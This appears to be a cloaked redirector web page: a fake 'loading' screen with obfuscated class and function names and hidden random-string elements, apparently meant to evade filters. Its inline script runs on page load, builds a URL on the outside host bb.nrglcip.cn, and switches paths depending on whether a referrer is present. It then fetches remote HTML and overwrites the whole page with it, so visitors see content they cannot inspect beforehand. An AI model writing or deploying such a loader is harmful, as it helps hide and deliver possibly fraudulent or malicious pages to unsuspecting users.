<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .n9RsaXX3X {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .n9RsaXX3X .e64VagZb {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .n9RsaXX3X .content {
            line-height: 50px;
            text-align: center
        }

        .n9RsaXX3X .img {
            width: 100%
        }

        .n9RsaXX3X .VknzAoDYPN {
            text-align: center
        }

        .n9RsaXX3X .VknzAoDYPN span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .n9RsaXX3X .VknzAoDYPN span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .n9RsaXX3X .VknzAoDYPN span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .n9RsaXX3X .VknzAoDYPN span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .n9RsaXX3X .VknzAoDYPN span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .n9RsaXX3X .VknzAoDYPN span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .n9RsaXX3X .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function gxNac7BI90nl4(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var jf5NZBD = gxNac7BI90nl4('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ jf5NZBD +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ jf5NZBD +".html?a=share";
		}
		
        JGGrqp=url+"#"+new Date().getTime();
        JGGrqp && function() {
            $.get(JGGrqp, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >sjOlLWfwRZ0jBdjt8vGaUQke</b>
<b style='display:none' >sjOlLWfwRZ0jBdjt8vGaUQke</b>
<a  href='#' style='display:none'>fmP33A9q1R5nBY9cU</a><div class="n9RsaXX3X">
    <div class="e64VagZb">
        <div class="VknzAoDYPN">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>l0VVBDzRWguM3U8</span>
<p  style='display:none'>o7pZTjPAHbZ2e3qUwMdBpnsOkRRtx4VjMJpZh1nPKUy9F31gVPD69ufqfWctok5x8</p>
<img  src='' style='display:none'>
<div style='display:none'>Ipmm7cXm8nk0nSJ5TDXXgPtOOg0U32Di75JcW3PTv0oWZeIa</div>
<b style='display:none' >sMdjlUb4CAN4IHzaEYXVYGOSyB0bgUPSrMo59JojmvNl0OchK7nws50QBeg89Dz9yqAjnB0FqwEsaE3bncHZMo23dj0K</b>
<b style='display:none' >sMdjlUb4CAN4IHzaEYXVYGOSyB0bgUPSrMo59JojmvNl0OchK7nws50QBeg89Dz9yqAjnB0FqwEsaE3bncHZMo23dj0K</b></body>
</html>